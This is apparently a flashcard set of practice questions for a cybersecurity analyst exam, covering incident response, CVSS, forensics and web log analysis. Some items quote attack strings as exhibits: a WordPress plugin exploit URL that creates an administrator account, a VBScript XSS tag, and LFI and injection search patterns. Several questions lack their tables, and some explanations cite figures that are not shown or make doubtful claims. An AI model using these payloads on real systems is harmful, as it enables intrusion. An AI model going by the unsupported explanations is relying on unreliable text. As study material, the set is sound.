
A vulnerability management team is unable to patch all vulnerabilities found during their weekly scans. Using the third-party scoring system described below, the team patches the most urgent vulnerabilities:

Additionally, the vulnerability management team feels that the metrics Smear and Channing are less important than the others, so these will be lower in priority. Which of the following vulnerabilities should be patched first, given the above third-party scoring system?

A. InLoud:
Cobain: Yes
Grohl: No
Novo: Yes
Smear: Yes
Channing: No

B. TSpirit:
Cobain: Yes
Grohl: Yes
Novo: Yes
Smear: No
Channing: No

C. ENameless:
Cobain: Yes
Grohl: No
Novo: Yes
Smear: No
Channing: No

D. PBleach:
Cobain: Yes
Grohl: No
Novo: No
Smear: No
Channing: Yes

A

B. TSpirit:

Cobain: Yes
Grohl: Yes
Novo: Yes
Smear: No
Channing: No

61
Q

A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?

A. Hacktivist.
B. Advanced persistent threat.
C. Insider threat.
D. Script kiddie.

A

C. Insider threat.

An insider threat refers to a person within an organization (in this case, the user) who poses a threat to the organization’s security. Insider threats can be unintentional, such as when a user unknowingly downloads and spreads malware.

62
Q

An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of the following should the CSIRT conduct next?

A. Take a snapshot of the compromised server and verify its integrity.
B. Restore the affected server to remove any malware.
C. Contact the appropriate government agency to investigate.
D. Research the malware strain to perform attribution.

A

A. Take a snapshot of the compromised server and verify its integrity.

The next action that the CSIRT should conduct after isolating the compromised server from the network is to take a snapshot of the compromised server and verify its integrity. Taking a snapshot and verifying its integrity can help preserve and protect any evidence or information related to the incident, as well as prevent any tampering, contamination, or destruction of evidence.

63
Q

During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?

A. Disk contents
B. Backup data
C. Temporary files
D. Running processes

A

D. Running processes

64
Q

A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region. Which of the following shell script functions could help achieve the goal?

A. function w() { a=$(ping -c 1 $1 | awk -F "/" 'END{print $1}') && echo "$1 | $a" }

B. function x() { b=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $b" }

C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short }

D. function z() { c=$(geoiplookup $1) && echo "$1 | $c" }

A

C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short }

This function takes an IP address as an argument and performs two DNS lookups with the dig command. The first lookup uses the -x option to perform a reverse DNS (PTR) lookup, and the grep, tail and awk pipeline keeps the reversed-octet portion of that name that precedes ".in-addr". The second lookup appends that portion to the origin.asn.cymru.com domain and queries its TXT record, which returns the autonomous system number (ASN) and related information for the address, such as the country code, registry, or allocation date. The function then prints that ASN information, which can help identify network addresses that belong to the same ASN or region.

65
Q

A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective?

A. function w() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $1}') && echo "$1 | $info" }

B. function x() { info=$(geoiplookup $1) && echo "$1 | $info" }

C. function y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo "$1 | $info" }

D. function z() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info" }

A

B. function x() { info=$(geoiplookup $1) && echo "$1 | $info" }

This function takes an IP address as an argument and uses the geoiplookup command to get the geographic location information associated with the IP address, such as the country name, country code, region, city, or latitude and longitude. The function then prints the IP address and the geographic location information, which can help identify any IP addresses that belong to the same country.

66
Q

A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment:

Which of the following should be completed first to remediate the findings?

A. Ask the web development team to update the page contents.
B. Add the IP address allow listing for control panel access.
C. Purchase an appropriate certificate from a trusted root CA.
D. Perform proper sanitization on all fields.

A

D. Perform proper sanitization on all fields.

The first action that should be completed to remediate the findings is to perform proper sanitization on all fields. Performing proper sanitization on all fields can help address the most critical and common vulnerability found during the vulnerability assessment.

67
Q

While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?

A. Shut the network down immediately and call the next person in the chain of command.
B. Determine what attack the odd characters are indicative of.
C. Utilize the correct attack framework and determine what the incident response will consist of.
D. Notify the local law enforcement for incident response.

A

B. Determine what attack the odd characters are indicative of.

In the context of reviewing web server logs, the most immediate and practical step is to investigate the nature of the odd characters in the request line. This involves understanding the patterns, syntax, and characteristics of these entries to determine if they are indicative of a particular attack or anomaly.

Simply shutting down the network (option A) or notifying law enforcement (option D) without understanding the nature of the issue might be premature and could disrupt normal operations unnecessarily. Utilizing the correct attack framework (option C) may come into play after identifying the attack type, but the initial focus should be on understanding the nature of the odd characters to assess the potential threat.

68
Q

A security team conducts a lessons-learned meeting after struggling to determine who should conduct the next steps following a security event. Which of the following should the team create to address this issue?

A. Service-level agreement.
B. Change management plan.
C. Incident response plan.
D. Memorandum of understanding.

A

C. Incident response plan.

69
Q

A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?

A. Geoblock the offending source country.
B. Block the IP range of the scans at the network firewall.
C. Perform a historical trend analysis and look for similar scanning activity.
D. Block the specific IP address of the scans at the network firewall.

A

B. Block the IP range of the scans at the network firewall.

Geoblocking the offending source country (option A) is not the best choice because of its negative impact on legitimate traffic, the ease with which it can be evaded, and its overly broad scope. Blocking the IP range of the scans at the network firewall (option B) is the most appropriate: it is straightforward, effective, and flexible, and it addresses the specific issue without harming legitimate traffic. Option B is therefore the most effective and balanced way to mitigate network scanning activity originating from a country with which the company does not do business.

70
Q

An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to be malicious and has attempted to exploit a zero-day vulnerability on several web servers. The exploit contained the following snippet:

/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator

Which of the following controls would work best to mitigate the attack represented by this snippet?

A. Limit user creation to administrators only.
B. Limit layout creation to administrators only.
C. Set the directory trx_addons to read only for all users.
D. Set the directory V2 to read only for all users.

A

A. Limit user creation to administrators only.

71
Q

A penetration tester submitted data to a form in a web application, which enabled the penetration tester to retrieve user credentials. Which of the following should be recommended for remediation of this application vulnerability?

A. Implementing multifactor authentication on the server OS.
B. Hashing user passwords on the web application.
C. Performing input validation before allowing submission.
D. Segmenting the network between the users and the web server.

A

C. Performing input validation before allowing submission.

72
Q

A cybersecurity team lead is developing metrics to present in the weekly executive briefs. Executives are interested in knowing how long it takes to stop the spread of malware that enters the network. Which of the following metrics should the team lead include in the briefs?

A. Mean time between failures.
B. Mean time to detect.
C. Mean time to remediate.
D. Mean time to contain.

A

D. Mean time to contain.

Mean time to contain is the metric that the cybersecurity team lead should include in the weekly executive briefs, as it measures how long it takes to stop the spread of malware that enters the network. Mean time to contain is the average time it takes to isolate and neutralize an incident or a threat, such as malware, from the time it is detected. Mean time to contain is an important metric for evaluating the effectiveness and efficiency of the incident response process, as well as the potential impact and damage of the incident or threat. A lower mean time to contain indicates a faster and more successful response, which can reduce the risk and cost of the incident or threat. Mean time to contain can also be compared with other metrics, such as mean time to detect or mean time to remediate, to identify gaps or areas for improvement in the incident response process.

73
Q

An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has:

  • created the initial evidence log.
  • disabled the wireless adapter on the device.
  • interviewed the employee, who was unable to identify the website that was accessed.
  • reviewed the web proxy traffic logs.

Which of the following should the analyst do to remediate the infected device?

A. Update the system firmware and reimage the hardware.
B. Install an additional malware scanner that will send email alerts to the analyst.
C. Configure the system to use a proxy server for Internet access.
D. Delete the user profile and restore data from backup.

A

A. Update the system firmware and reimage the hardware.

74
Q

A cloud team received an alert that unauthorized resources were being auto-provisioned. After investigating, the team suspects that cryptomining is occurring. Which of the following indicators would most likely lead the team to this conclusion?

A. High GPU utilization.
B. Bandwidth consumption.
C. Unauthorized changes.
D. Unusual traffic spikes.

A

A. High GPU utilization.

74
Q

A company’s security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs cryptominers on workstations in the office). Besides the security team, which of the following groups should the issue be escalated to first, in order to comply with industry best practices?

A. Help desk.
B. Law enforcement.
C. Legal department.
D. Board member.

A

C. Legal department.

75
Q

Given the following CVSS string:

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Which of the following attributes correctly describes this vulnerability?

A. A user is required to exploit this vulnerability.
B. The vulnerability is network based.
C. The vulnerability does not affect confidentiality.
D. The complexity to exploit the vulnerability is high.

A

B. The vulnerability is network based.

AV:N: the vulnerability is network-based
AC:L: attack complexity is low
PR:N: no privileges are required to exploit the vulnerability
UI:N: no user interaction is required
S:U: scope is unchanged
C:H: confidentiality impact is high
I:H: integrity impact is high
A:H: availability impact is high

76
Q

A cryptocurrency service company is primarily concerned with ensuring the accuracy of the data on one of its systems. A security analyst has been tasked with prioritizing vulnerabilities for remediation for the system. The analyst will use the following CVSSv3.1 impact metrics for prioritization:

Which of the following vulnerabilities should be prioritized for remediation?

A. 1
B. 2
C. 3
D. 4

A

D. 4

The question states that the company is "primarily concerned with ensuring the accuracy of the data", in other words integrity. Preserving the integrity of the data is the priority, so the analyst should prioritize vulnerabilities that affect integrity (the I metric in CVSS 3.1):

V1 - I:L: integrity impact is low
V2 - I:L: integrity impact is low
V3 - I:N: integrity impact is none
V4 - I:H: integrity impact is high

77
Q

Patches for two highly exploited vulnerabilities were released on the same Friday afternoon. Information about the systems and vulnerabilities is shown in the tables below:

Which of the following should the security analyst prioritize for remediation?

A. rogers
B. brady
C. brees
D. manning

A

B. brady

78
Q

A security analyst must preserve a system hard drive that was involved in a litigation request. Which of the following is the best method to ensure the data on the device is not modified?

A. Generate a hash value and make a backup image.
B. Encrypt the device to ensure confidentiality of the data.
C. Protect the device with a complex password.
D. Perform a memory scan dump to collect residual data.

A

A. Generate a hash value and make a backup image.

79
Q

Which of the following best describes the goal of a tabletop exercise?

A. To test possible incident scenarios and how to react properly.
B. To perform attack exercises to check response effectiveness.
C. To understand existing threat actors and how to replicate their techniques.
D. To check the effectiveness of the business continuity plan.

A

A. To test possible incident scenarios and how to react properly.

A tabletop exercise is a type of simulation exercise that involves testing possible incident scenarios and how to react properly, without actually performing any actions or using any resources. A tabletop exercise is usually conducted by a facilitator who presents a realistic scenario to a group of participants, such as a cyberattack, a natural disaster, or a data breach. The participants then discuss and evaluate their roles, responsibilities, plans, procedures, and policies for responding to the incident, as well as the potential impacts and outcomes. A tabletop exercise can help identify strengths and weaknesses in the incident response plan, improve communication and coordination among the stakeholders, raise awareness and preparedness for potential incidents, and provide feedback and recommendations for improvement.

80
Q

A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and added back into the server pool, users reported issues with the website, indicating the site could not be trusted.

Which of the following is the most likely cause of the server issue?

A. The server was configured to use SSL to securely transmit data.
B. The server was supporting weak TLS protocols for client connections.
C. The malware infected all the web servers in the pool.
D. The digital certificate on the web server was self-signed.

A

D. The digital certificate on the web server was self-signed.

A digital certificate is a document that contains the public key and identity information of a web server, and is signed by a trusted third-party authority called a certificate authority (CA). A digital certificate allows the web server to establish a secure connection with the clients using the HTTPS protocol, and also verifies the authenticity of the web server. A self-signed certificate is a digital certificate that is not signed by a CA, but by the web server itself. A self-signed certificate can cause issues with the website, as it may not be trusted by the clients or their browsers. Clients may receive warnings or errors when trying to access the website, indicating that the site could not be trusted or that the connection is not secure.

81
Q

A zero-day command injection vulnerability was published. A security administrator is analyzing the following logs for evidence of adversaries attempting to exploit the vulnerability:

Which of the following log entries provides evidence of the attempted exploit?

A. Log entry 1
B. Log entry 2
C. Log entry 3
D. Log entry 4

A

A. Log entry 1

This entry appears to contain a command injection attempt in the URL using Java’s Runtime class.

82
Q

A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted.

Which of the following should the security analyst perform first to categorize and prioritize the respective systems?

A. Interview the users who access these systems.
B. Scan the systems to see which vulnerabilities currently exist.
C. Configure alerts for vendor-specific zero-day exploits.
D. Determine the asset value of each system.

A

D. Determine the asset value of each system.

83
Q

A security analyst is reviewing the following alert that was triggered by FIM on a critical system:

Which of the following best describes the suspicious activity that is occurring?

A. A fake antivirus program was installed by the user.
B. A network drive was added to allow exfiltration of data.
C. A new program has been set to execute on system start.
D. The host firewall on 192.168.1.10 was disabled.

A

C. A new program has been set to execute on system start.

84
Q

A technician is analyzing output from a popular network mapping tool for a PCI audit:

Which of the following best describes the output?

A. The host is not up or responding.
B. The host is running excessive cipher suites.
C. The host is allowing insecure cipher suites.
D. The Secure Shell port on this host is closed.

A

C. The host is allowing insecure cipher suites.

The output shows the result of running the ssl-enum-ciphers script with Nmap, which is a tool that can scan web servers for supported SSL/TLS cipher suites. Cipher suites are combinations of cryptographic algorithms that are used to establish secure communication between a client and a server. The output shows the cipher suites that are supported by the server, along with a letter grade (A through F) indicating the strength of the connection. The output also shows the least strength, which is the strength of the weakest cipher offered by the server. In this case, the least strength is F, which means that the server is allowing insecure cipher suites that are vulnerable to attacks or have been deprecated. For example, the output shows that the server supports SSLv3, which is an outdated and insecure protocol that is susceptible to the POODLE attack. The output also shows that the server supports RC4, which is a weak and broken stream cipher that should not be used. Therefore, the best description of the output is that the host is allowing insecure cipher suites.

The other descriptions are not accurate, as they do not reflect what the output shows. “The host is not up or responding” is incorrect, as the output clearly shows that the host is up and responding to the scan. “The host is running excessive cipher suites” is incorrect, as the output does not indicate how many cipher suites the host is running, only which ones it supports. “The Secure Shell port on this host is closed” is incorrect, as the output does not show anything about port 22, which is the default port for Secure Shell (SSH). The output only shows information about port 443, which is the default port for HTTPS.

85
Q

An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has:

  • created the initial evidence log.
  • disabled the wireless adapter on the device.
  • interviewed the employee, who was unable to identify the website that was accessed.
  • reviewed the web proxy traffic logs.

Which of the following should the analyst do to remediate the infected device?

A. Update the system firmware and reimage the hardware.
B. Install an additional malware scanner that will send email alerts to the analyst.
C. Configure the system to use a proxy server for Internet access.
D. Delete the user profile and restore data from backup.

A

A. Update the system firmware and reimage the hardware.

Updating the system firmware and reimaging the hardware is the best action to perform to remediate the infected device, as it helps to ensure that the device is restored to a clean and secure state and that any traces of malware are removed.

86
Q

A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the security analyst use to search the web server logs for evidence of exploitation of that particular vulnerability?

A. /etc/shadow
B. curl localhost
C. ; printenv
D. cat /proc/self/

A

A. /etc/shadow

/etc/shadow is the pattern that the security analyst can use to search the web server logs for evidence of exploitation of the LFI vulnerability that can be exploited to extract credentials from the underlying host. LFI stands for Local File Inclusion, which is a vulnerability that allows an attacker to include local files on the web server into the output of a web application. LFI can be exploited to extract sensitive information from the web server, such as configuration files, passwords, or source code. The /etc/shadow file stores the hashed passwords of all users on a Linux system. If an attacker can exploit the LFI vulnerability to include this file in the web application output, they can obtain the credentials of the users on the web server. Therefore, the security analyst can look for /etc/shadow in the request line of the web server logs to see if any attacker has attempted or succeeded in exploiting the LFI vulnerability.

87
Q

While reviewing web server logs, a security analyst found the following line:

<IMG SRC='vbscript:msgbox("test")'>

Which of the following malicious activities was attempted?

A. Command injection
B. XML injection
C. Server-side request forgery
D. Cross-site scripting

A

D. Cross-site scripting

XSS is a type of web application attack that exploits the vulnerability of a web server or browser to execute malicious scripts or commands on the client side. XSS attackers inject malicious code, such as JavaScript, VBScript, HTML, or CSS, into a web page or application that is viewed by other users. The malicious code can then access or manipulate the user’s session, cookies, browser history, or personal information, or perform actions on behalf of the user, such as stealing credentials, redirecting to phishing sites, or installing malware.

The line in the web server log shows an example of an XSS attack using VBScript. The attacker tried to insert an <img> tag with a malicious SRC attribute that contains VBScript code. The VBScript code is intended to display a message box with the text “test” when the user views the web page or application. This is a simple and harmless example of XSS, but it could be used to test the vulnerability of the web server or browser, or to launch more sophisticated and harmful attacks.

88
Q

An incident response team is working with law enforcement to investigate an active web server compromise. The decision has been made to keep the server running and to implement compensating controls for a period of time. The web service must be accessible from the internet via the reverse proxy and must connect to a database server. Which of the following compensating controls will help contain the adversary while meeting the other requirements? (Select two)

A. Drop the tables on the database server to prevent data exfiltration.
B. Deploy EDR on the web server and the database server to reduce the adversary’s capabilities.
C. Stop the httpd service on the web server so that the adversary cannot use web exploits.
D. Use micro segmentation to restrict connectivity to/from the web and database servers.
E. Comment out the HTTP account in the /etc/passwd file of the web server.
F. Move the database from the database server to the web server.

A

B. Deploy EDR on the web server and the database server to reduce the adversary’s capabilities.
D. Use micro segmentation to restrict connectivity to/from the web and database servers.

Deploying EDR on the web server and the database server to reduce the adversary’s capabilities and using micro segmentation to restrict connectivity to/from the web and database servers are two compensating controls that will help contain the adversary while meeting the other requirements. A compensating control is a security measure that is implemented to mitigate the risk of a vulnerability or an attack when the primary control is not feasible or effective. EDR stands for Endpoint Detection and Response, which is a tool that monitors endpoints for malicious activity and provides automated or manual response capabilities. EDR can help contain the adversary by detecting and blocking their actions, such as data exfiltration, lateral movement, privilege escalation, or command execution. Micro segmentation is a technique that divides a network into smaller segments based on policies and rules, and applies granular access controls to each segment. Micro segmentation can help contain the adversary by isolating the web and database servers from other parts of the network, and limiting the traffic that can flow between them.

89
Q

Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m.?

A. SLA
B. LOI
C. MOU
D. KPI

A

A. SLA

SLA (Service Level Agreement) is the best term to describe the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m., as it reflects the agreement between a service provider and a customer that specifies the services, quality, availability, and responsibilities that are agreed upon.

An SLA is a common type of document that is used in various industries and contexts, such as IT, telecom, cloud computing, or outsourcing. An SLA typically includes metrics and indicators to measure the performance and quality of the service, such as uptime, response time, or resolution time. An SLA also defines the consequences or remedies for any breaches or failures of the service, such as penalties, refunds, or credits. An SLA can help to manage customer expectations, formalize communication, improve productivity, and strengthen relationships. The other terms are not as accurate as SLA, as they describe different types of documents or concepts.

LOI (Letter of Intent) is a document that outlines the main terms and conditions of a proposed agreement between two or more parties, before a formal contract is signed. An LOI is usually non-binding and expresses the intention or interest of the parties to enter into a future agreement. An LOI can help to clarify the key points of a deal, facilitate negotiations, or demonstrate commitment.

MOU (Memorandum of Understanding) is a document that describes a mutual agreement or cooperation between two or more parties, without creating any legal obligations or commitments. An MOU is usually more formal than an LOI, but less formal than a contract. An MOU can help to establish a common ground, define roles and responsibilities, or outline expectations and goals.

KPI (Key Performance Indicator) is a concept that refers to a measurable value that demonstrates how effectively an organization or individual is achieving its key objectives or goals. A KPI is usually quantifiable and specific, such as revenue growth, customer satisfaction, or employee retention. A KPI can help to track progress, evaluate performance, or identify areas for improvement.

90
Q

A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?

A. Credentialed network scanning
B. Passive scanning
C. Agent-based scanning
D. Dynamic scanning

A

C. Agent-based scanning

Agent-based scanning is a method that involves installing software agents on the target systems or networks that can perform local scans and report the results to a central server or console.

Agent-based scanning can reduce the access to systems, as the agents do not require any credentials or permissions to scan the local system or network.

Agent-based scanning can also provide the most accurate vulnerability scan results, as the agents can scan continuously or on-demand, regardless of the system or network status or location.

91
Q

A security audit for unsecured network services was conducted, and the following output was generated:

Which of the following services should the security team investigate further? (Select two):

A. 21
B. 22
C. 23
D. 636
E. 1723
F. 3389

A

C. 23
D. 636

The output shows the results of a port scan, which is a technique used to identify open ports and services running on a network host. Port scanning can be used by attackers to discover potential vulnerabilities and exploit them, or by defenders to assess the security posture and configuration of their network devices. The output lists six ports that are open on the target host, along with the service name and version associated with each port. The service name indicates the type of application or protocol that is using the port, while the version indicates the specific release or update of the service. The service name and version can provide useful information for both attackers and defenders, as they can reveal the capabilities, features, and weaknesses of the service.

Among the six ports listed, two are particularly risky and should be investigated further by the security team: port 23 and port 636.

Port 23 is used by Telnet, which is an old and insecure protocol for remote login and command execution. Telnet does not encrypt any data transmitted over the network, including usernames and passwords, which makes it vulnerable to eavesdropping, interception, and modification by attackers. Telnet also has many known vulnerabilities that can allow attackers to gain unauthorized access, execute arbitrary commands, or cause denial-of-service attacks on the target host.

Port 636 is used by LDAP over SSL/TLS (LDAPS), which is a protocol for accessing and modifying directory services over a secure connection. LDAPS encrypts the data exchanged between the client and the server using SSL/TLS certificates, which provide authentication, confidentiality, and integrity. However, LDAPS can also be vulnerable to attacks if the certificates are not properly configured, verified, or updated. For example, attackers can use self-signed or expired certificates to perform man-in-the-middle attacks, spoofing attacks, or certificate revocation attacks on LDAPS connections. Therefore, the security team should investigate further why port 23 and port 636 are open on the target host, and what services are running on them. The security team should also consider disabling or replacing these services with more secure alternatives, such as SSH for port 23 and StartTLS for port 636.

92
Q

A Chief Information Security Officer (CISO) is concerned that a specific threat actor, who is known to target the company’s business type, may be able to breach the network and remain inside of it for an extended period of time. Which of the following techniques should be performed to meet the CISO’s goals?

A. Vulnerability scanning
B. Adversary emulation
C. Passive discovery
D. Bug bounty

A

B. Adversary emulation

Adversary emulation is a technique that involves mimicking the tactics, techniques, and procedures (TTPs) of a specific threat actor or group to test the effectiveness of the security controls and incident response capabilities of an organization.

Adversary emulation can help identify and address the gaps and weaknesses in the security posture of an organization, as well as improve the readiness and skills of the security team.

Adversary emulation can also help measure the dwell time, which is the duration that a threat actor remains undetected inside the network. The other options are not the best techniques to meet the CISO’s goals.

Vulnerability scanning (A) is a technique that involves scanning the network and systems for known vulnerabilities, but it does not simulate a real attack or test the incident response capabilities.

Passive discovery (C) is a technique that involves collecting information about the network and systems without sending any packets or probes, but it does not identify or exploit any vulnerabilities or test the security controls.

Bug bounty (D) is a program that involves rewarding external researchers or hackers for finding and reporting vulnerabilities in an organization’s systems or applications, but it does not focus on a specific threat actor or group.

93
Q

A security analyst performs a vulnerability scan. Based on the metrics from the scan results, the analyst must prioritize which hosts to patch. The analyst runs the tool and receives the following output:

Which of the following hosts should be patched first, based on the metrics?

A. host01
B. host02
C. host03
D. host04

A

C. host03

Host03 should be patched first, based on the metrics, as it has the highest risk score and the highest number of critical vulnerabilities. The risk score is calculated by multiplying the CVSS score by the exposure factor, which is the percentage of systems that are vulnerable to the exploit. Host03 has a risk score of 10 x 0.9 = 9, which is higher than any other host. Host03 also has 5 critical vulnerabilities, which are the most severe and urgent to fix, as they can allow remote code execution, privilege escalation, or data loss. The other hosts have lower risk scores and lower numbers of critical vulnerabilities, so they can be patched later.

94
Q

A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region. Which of the following shell script functions could help achieve the goal?

A. function w() { a=$(ping -c 1 $1 | awk -F "/" 'END{print $1}') && echo "$1 | $a"; }

B. function x() { b=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $b"; }

C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short; }

D. function z() { c=$(geoiplookup $1) && echo "$1 | $c"; }

A

C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short; }

The shell script function that could help identify possible network addresses from different source networks belonging to the same company and region is:

function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short; }

This function takes an IP address as an argument and performs two DNS lookups using the dig command. The first lookup uses the -x option to perform a reverse DNS lookup and get the hostname associated with the IP address. The second lookup uses the origin.asn.cymru.com domain to get the autonomous system number (ASN) and other information related to the IP address, such as the country code, registry, or allocation date. The function then prints the IP address and the ASN information, which can help identify any network addresses that belong to the same ASN or region.

95
Q

Given the following CVSS string:

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Which of the following attributes correctly describes this vulnerability?

A. A user is required to exploit this vulnerability.
B. The vulnerability is network based.
C. The vulnerability does not affect confidentiality.
D. The complexity to exploit the vulnerability is high.

A

B. The vulnerability is network based.

The vulnerability is network based is the correct attribute that describes this vulnerability, as it can be inferred from the CVSS string. CVSS stands for Common Vulnerability Scoring System, which is a framework that assigns numerical scores and ratings to vulnerabilities based on their characteristics and severity.

The CVSS string consists of several metrics that define different aspects of the vulnerability, such as the attack vector, the attack complexity, the privileges required, the user interaction, the scope, and the impact on confidentiality, integrity and availability. The first metric in the CVSS string is the attack vector (AV), which indicates how the vulnerability can be exploited. The value of AV in this case is N, which stands for network. This means that the vulnerability can be exploited remotely over a network connection, without physical or logical access to the target system. Therefore, the vulnerability is network based.

96
Q

After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too high. The CISO refused the software request. Which of the following risk management principles did the CISO select?

A. Avoid
B. Transfer
C. Accept
D. Mitigate

A

A. Avoid

Avoid is a risk management principle that describes the decision or action of not engaging in an activity or accepting a risk that is deemed too high or unacceptable. Avoiding a risk can eliminate the possibility or impact of the risk, as well as the need for any further risk management actions. In this case, the CISO decided the risk score would be too high and refused the software request. This indicates that the CISO selected the avoid principle for risk management.

97
Q

An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence?

A. Disable the user’s network account and access to web resources.
B. Make a copy of the files as a backup on the server.
C. Place a legal hold on the device and the user’s network share.
D. Make a forensic image of the device and create a SHA1 hash.

A

D. Make a forensic image of the device and create a SHA1 hash.

Making a forensic image of the device and creating a SHA1 hash is the best step to preserve evidence, as it creates an exact copy of the device’s data and verifies its integrity. A forensic image is a bit-by-bit copy of the device’s storage media, which preserves all the information on the device, including deleted or hidden files. A SHA1 hash is a cryptographic value that is calculated from the forensic image, which can be used to prove that the image has not been altered or tampered with. The other options are not as effective as making a forensic image and creating a SHA1 hash, as they may not capture all the relevant data, or they may not provide sufficient verification of the evidence’s authenticity.

98
Q

During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened. Which of the following actions should the analyst take first?

A. Clone the virtual server for forensic analysis.
B. Log in to the affected server and begin analysis of the logs.
C. Restore from the last known-good backup to confirm there was no loss of connectivity.
D. Shut down the affected server immediately.

A

A. Clone the virtual server for forensic analysis.

The first action that the analyst should take in this case is to clone the virtual server for forensic analysis. Cloning the virtual server involves creating an exact copy or image of the server’s data and state at a specific point in time. Cloning the virtual server can help preserve and protect any evidence or information related to the security incident, as well as prevent any tampering, contamination, or destruction of evidence. Cloning the virtual server can also allow the analyst to safely analyze and investigate the incident without affecting the original server or its operations.

99
Q

You are a penetration tester who is reviewing the system hardening guidelines for a company. Hardening guidelines indicate the following:

  • There must be one primary server or service per device.
  • Only default ports should be used.
  • Non-secure protocols should be disabled.
  • The corporate internet presence should be placed in a protected subnet.

Using the available tools, discover devices on the corporate network and the services running on these devices. You must determine:

  • IP address of each device.
  • The primary server or service of each device.
  • The protocols that should be disabled based on the hardening guidelines.

A

100
Q

A security analyst reviews the latest vulnerability scans and observes there are vulnerabilities with similar CVSSv3 scores but different base score metrics. Which of the following attack vectors should the analyst remediate first?

A. CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
B. CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
C. CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
D. CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

A

C. CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

101
Q

Which of the following best describes the process of requiring remediation of a known threat within a given time frame?

A. SLA
B. MOU
C. Best-effort patching
D. Organizational governance

A

A. SLA

102
Q

The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the risk to the organization. Which of the following solutions will assist in reducing the risk?

A. Deploy a CASB and enable policy enforcement.
B. Configure MFA with strict access.
C. Deploy an API gateway.
D. Enable SSO to the cloud applications.

A

A. Deploy a CASB and enable policy enforcement.

A cloud access security broker (CASB) is a tool that can help reduce the risk of shadow IT in the enterprise by providing visibility and control over cloud applications and services. A CASB can enable policy enforcement by blocking unauthorized or risky cloud applications, enforcing data loss prevention rules, encrypting sensitive data, and detecting anomalous user behavior.

103
Q

A recent penetration test discovered that several employees were enticed to assist attackers by visiting specific websites and running downloaded files when prompted by phone calls. Which of the following would best address this issue?

A. Increasing training and awareness for all staff.
B. Ensuring that malicious websites cannot be visited.
C. Blocking all scripts downloaded from the internet.
D. Disabling all staff members’ ability to run downloaded applications.

A

A. Increasing training and awareness for all staff.

Increasing training and awareness for all staff is the best way to address the issue of employees being enticed to assist attackers by visiting specific websites and running downloaded files when prompted by phone calls. This issue is an example of social engineering, which is a technique that exploits human psychology and behavior to manipulate people into performing actions or divulging information that benefit the attackers. Social engineering can take many forms, such as phishing, vishing, baiting, quid pro quo, or impersonation. The best defense against social engineering is to educate and train the staff on how to recognize and avoid common social engineering tactics.

104
Q

During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?

A. Conduct regular red team exercises over the application in production.
B. Ensure that all implemented coding libraries are regularly checked.
C. Use application security scanning as part of the pipeline for the CI/CD flow.
D. Implement proper input validation for any data entry form.

A

C. Use application security scanning as part of the pipeline for the CI/CD flow.

Application security scanning is a process that involves testing and analyzing applications for security vulnerabilities, such as injection flaws, broken authentication, cross-site scripting, and insecure configuration. Application security scanning can help identify and fix security issues before they become exploitable by attackers.

